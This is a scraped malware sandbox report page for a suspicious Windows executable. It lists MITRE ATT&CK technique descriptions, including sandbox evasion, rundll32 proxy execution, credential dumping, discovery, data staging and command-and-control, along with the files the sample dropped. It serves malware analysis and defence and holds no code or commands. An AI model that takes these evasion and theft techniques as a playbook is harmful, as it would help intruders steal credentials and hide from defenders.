Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 08.02.2022_Prox0030_0122- TAIWAN HOKURYO CO.,LTD.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\d6wtv4o01bbhxt.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\image.exe.log

C:\Users\user\AppData\Local\Temp\DB1

C:\Users\user\AppData\Local\Temp\IXP000.TMP\image.exe

C:\Users\user\AppData\Local\Temp\Qplltzvap\d6wtv4o01bbhxt.exe

\Device\ConDrv

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Windows Analysis Report
08.02.2022_Prox0030_0122- TAIWAN HOKURYO CO.,LTD.exe

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer.Shutting down or rebooting systems may disrupt access to computer resources for legitimate users.
Tactics:	Impact
Data Sources:	Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre